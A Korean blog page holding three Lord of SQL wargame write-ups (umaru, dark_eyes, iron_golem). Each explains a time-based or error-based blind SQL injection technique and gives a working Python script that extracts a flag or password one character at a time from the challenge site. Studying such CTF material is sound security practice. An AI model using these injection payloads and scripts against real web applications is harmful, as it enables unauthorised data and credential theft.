btr95

[LOS] umaru

2018. 10. 18. 13:29

앞선 문제와 달리 상당한 길이여서 혼란스러운 문제이지만 간단하게 동작하는 내용은

ⓐ flag의 값을 필터링

ⓑ 현재 로그인 session을 가지고 flag를 가져옴

ⓓ 임시 테이블에 flag 값을 update

ⓔ 임시 테이블의 flag 값을 가져옴

ⓕ session에 대한 flag값이 없거나, 원래 테이블의 flag값과 입력한 flag 값이 다르면 flag reset ( reset_flag()함수를 통해서 )

ⓖ 원래 테이블의 flag값과 입력한 flag값이 동일하면 문제 해결

로 구문을 해석 할 수 있습니다.

여기서 중요한 사항은 우리가 공격할 수 있는 injection point는 update구문 뿐이며 올바른 값을 입력하지 않으면 매번 값이 바뀐다는 것입니다.

아무거나 입력하면 아래와 같이 "reset ok"라고 나오면서 flag값이 변하기 때문에 주의해야 합니다.

생각해 볼 수 있는 사항

① 정확한 flag값을 알아야 하기 때문에 blind sql injection을 해야 함

② 값을 조작할 만한 곳은 Update문 뿐

③ Update문이 실행이 되면 reset이 됨

④ flag는 16자리 (substr로 나눔)

blind sql injection을 통해 update문을 injection 하면 되는 문제입니다.

하지만 어떠한 정보도 내주지 않고 있고, error도 나오지 않으니 Time-base blind sql injectioin으로 문제를 해결해야 합니다.

그리고 update문이 실행이 되지 않게 하기 위해서 (select 1 union select 2)를 통해 error를 발생 시켜야 합니다.

time-base로 하려면 sleep()을 이용해서 몇 초간 응답에 따라서 참/거짓을 알 수 있습니다.

참/거짓을 구분하기 위한 조건문이 필요한데 if문은 ','가 필요해서 case when으로 대체 할 수 있었습니다

substr에도 ','가 필요하지만 flag from 1 for 1을 하면 첫번째 문자를 가져오게 됩니다..

알아낸 정보를 가지고 Python code를 작성하면 아래와 같습니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
import time
 
cookies= {'PHPSESSID':'YourCookieValue'}
url = 'https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php?'
index_list = range(48,58)+range(97,123) # 0~1, a~z
 
password = ''
 
for i in range(1,17):
    for j in index_list:
        query = "flag=(select 1 union select 2) or case when substr(flag from {0} for 1)='{1}' then sleep(2) end".format(i,chr(j))
        payload = url+query
        print (payload)
 
        time1 = time.time()
        res = requests.get(payload, cookies=cookies)
        time2 = time.time()
 
        if(time2-time1>2):
            password += chr(j)
            break
print("password : "+password)
Colored by Color Scripter
cs

[참고]

case when: http://www.gurubee.net/lecture/1028

HINT:

http://security04.tistory.com/170

http://rls1004.tistory.com/33

저작자표시 비영리 변경금지

'WarGame > LOS(Lord of SQL)' 카테고리의 다른 글

[LOS] dark_eyes (0)	2018.10.12
[LOS] iron_golem (1)	2018.10.11
[LOS] dragon (0)	2018.10.10
[LOS] xavis (0)	2018.10.10
[LOS] nigthmare (0)	2018.10.08

[LOS] dark_eyes

2018. 10. 12. 12:16

iron_golem 문제처럼 Error Base Blind SQL Injection입니다.

하지만 if와 case/when을 필터링하여 조건문으로 풀지 못하게 했습니다.

또한 error massage도 띄어주지 않네요 ~_~

이번에는 order by를 이용해서 문제를 해결하려고 합니다.

[order by를 이용한 풀이]

' or 1 order by (select 1 from (select 1 union select 2)m where id='admin' and length(pw)=1)%23

3가지 항목에 주목하셔야 합니다.

ⓐ order by: 특정 순서 혹인 정렬을 위한 SQL 입니다.

ⓑ select 1 union select 2: Error를 유발하기 위한 구문

[ select 1 from (select 1 union select 2)m where 1=1 ]을 하게 되면 아래와 같이 행이 2개가 출력 되고,

[ select 1 from (select 1 union select 2)m where 1=2 ]을 하게 되면 아래와 같이 거짓으로 아무것도 나오지 않습니다.

⑴ length(pw) 가 참 일 경우)

Subquery에서 행 2개 출력 → order by 구문에서 Error → if(mysql_error()) exit(); 로 인해 빈 창으로 이동

⑵ length(pw) 가 거짓 일 경우)

Subquery에서 결과 x → order by 구문에서 정상 진행 → if(mysql_error()) exit(); 통과 후 echo 실행

어떻게 풀어야 할지 알았으니 Python으로 풀어봅니다.

id='admin'을 추가한 이유는 guest의 값이 나올 수 있기에 사용했습니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests
 
cookies= {'PHPSESSID':'YourCookieValue'}
url = 'https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?'
index_list = range(48,58)+range(97,123) #0~9, a~z
password = ''
length = 0
 
for i in range(1,99):
    query = "pw=' or 1 order by (select 1 from (select 1 union select 2)m where id='admin' and length(pw)={0})%23".format(i)
    payload = url+query
    print (payload)
    res = requests.get(payload, cookies=cookies)
    if((res.text).find("query")<0):
        length = i
        print("length: "+str(length))
        break    
 
for i in range(1,length+1):
    for j in index_list:
        query = "pw=' or 1 order by (select 1 from (select 1 union select 2)m where id='admin' and substr(pw,{0},1)='{1}')%23".format(i,chr(j))
        payload = url+query
        print (payload)
        res = requests.get(payload, cookies=cookies)
        if((res.text).find("query")<0):
            password += chr(j)
            print("password: "+password)
            break
        
print ("password : "+password)
Colored by Color Scripter
cs

[참고]

에러기반 블라인드 인젝션: http://blog.naver.com/PostView.nhn?blogId=dmbs335&logNo=200000287070&parentCategoryNo=&categoryNo=67&viewDate=&isShowPopularPosts=true&from=search

Blind sql injection: https://github.com/solmonk/writeup/blob/master/blind.md

저작자표시 비영리 변경금지

'WarGame > LOS(Lord of SQL)' 카테고리의 다른 글

[LOS] umaru (0)	2018.10.18
[LOS] iron_golem (1)	2018.10.11
[LOS] dragon (0)	2018.10.10
[LOS] xavis (0)	2018.10.10
[LOS] nigthmare (0)	2018.10.08

[LOS] iron_golem

2018. 10. 11. 12:17

이번 문제를 보시면 mysql_error() 라는 항목이 추가되었고 항상 보여주던 "Hello ~~~~"가 없어졌습니다.

형식을 보면 blind sql injection이 분명한데 어떻게 참 거짓을 구분해야 할까요?

Injection 중에 별로 신경은 안 썼지만 Error Base SQL Injection이라는 기술이 있습니다.

mysql_error() 함수를 통해서 Query의 오류를 통해서 비밀번호를 하나씩 찾아낼 수 있습니다.

우선 평소처럼 blind sql injection이 되는지 확인하기 위해 다음과 같이 입력해도 참/거짓을 판단할 수 없기 때문에 의미가 없습니다.

일부러 구문 오류를 내봅니다. '(single quarter) 하나만 전송해보면 다음과 같이 error 문구가 나오게 됩니다.

이 error 문구를 이용해서 문제를 푸실 수 있습니다.

Error Base Blind SQL Injection에 대한 내용을 찾다가 몇 가지 Payload를 알게 되었습니다.

ⓐ 조건문 사용: 1 and if($tg,1,(select 1 union select 2))

ⓑ order by/group by: 1 order by (select 1 from (select 1 union select 2)m where $tg=1)

ⓓ case when then 형식 조건문 사용: select case 1 when 1 then (select 1 union select 2) end;

[정규식 관련 에러를 이용]

ⓐ 필터링이 쿼리 실행 이후에 일어나는 사례

ⓑ 쿼리가 실행은 되지만 결과가 출력 되지 않는 사례의 시간 기반 대용

ⓓ insert 문과 delete 문을 동작을 막으면서 데이터를 추출하기

(출처: dmbs님의 블로그, URL 하단 표기)

그 중에 조건문을 이용해서 문제를 풀어봤습니다.

if(조건, 참일 때 실행, 거짓일 때 실행)를 이용하면 조건문에 우선 1=1 이라는 참 값을 놓고 확인해 봅니다.

해당 Query는 참이기 때문에 Error가 표시가 안됩니다.

하지만 조건식에 1=2 라고 표시하고 전송하면 다음과 같이 subquery의 결과 1개가 리턴 됐다고 나오게 됩니다.

해당 문구가 나오면 실패한 것이니 우선 pw의 길이를 찾아봅니다.

찾아보시면 16자리가 나오게 되지만 전 문제와 동일하게 1글자가 4byte인 Unicode로 되어있었습니다.

그렇게 총 4글자의 Unicode라는 것을 알게 되었으니 Python을 이용해서 풀어봅니다.

앞선 문제와 달라진 구문은 find()를 사용할 때 "Subquery returns more than 1 row"로 하고 못 찾을 때라 "<0"라고 합니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import requests
 
cookies= {'PHPSESSID':'YourCookieValue'}
url = 'https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php?'
password = ''
length = 0
 
#pw 길이 구하기 (1글자가 4byte라고 알기 전)
for i in range(1,99):
    query = "pw=' or if(length(pw)={0},1,(select 1 union select 2))%23".format(i)
    payload = url+query
    print (payload)
    res = requests.get(payload, cookies=cookies)
    if((res.text).find("Subquery returns more than 1 row")<0):
        length = i
        print("length: "+str(length))
        break    
 
 
#pw 구하기 (1글자가 4byte라고 알게 된 후, 고정 길이)
for i in range(1,5):
    for j in range(33,127):
        query = "pw=' or if(ord(substr(pw,{0},1))={1},1,(select 1 union select 2))%23".format(i,j)
        payload = url+query
        print (payload)
        res = requests.get(payload, cookies=cookies)
        if((res.text).find("Subquery returns more than 1 row")<0):
            password += chr(j)
            print("password: "+password)
            break
        
print ("password : "+password)
Colored by Color Scripter
cs

(한글 인코딩이 안되어 있어 주석을 지우고 실행해야 합니다)

[참고]

에러기반 블라인드 인젝션: http://blog.naver.com/PostView.nhn?blogId=dmbs335&logNo=200000287070&parentCategoryNo=&categoryNo=67&viewDate=&isShowPopularPosts=true&from=search

저작자표시 비영리 변경금지

'WarGame > LOS(Lord of SQL)' 카테고리의 다른 글

[LOS] umaru (0)	2018.10.18
[LOS] dark_eyes (0)	2018.10.12
[LOS] dragon (0)	2018.10.10
[LOS] xavis (0)	2018.10.10
[LOS] nigthmare (0)	2018.10.08

PREV 1 ···17 18 19 20 21 22 23 ···47 NEXT

btr95

[LOS] umaru

'WarGame > LOS(Lord of SQL)' 카테고리의 다른 글

[LOS] dark_eyes

'WarGame > LOS(Lord of SQL)' 카테고리의 다른 글

[LOS] iron_golem

'WarGame > LOS(Lord of SQL)' 카테고리의 다른 글

+ Recent posts

티스토리툴바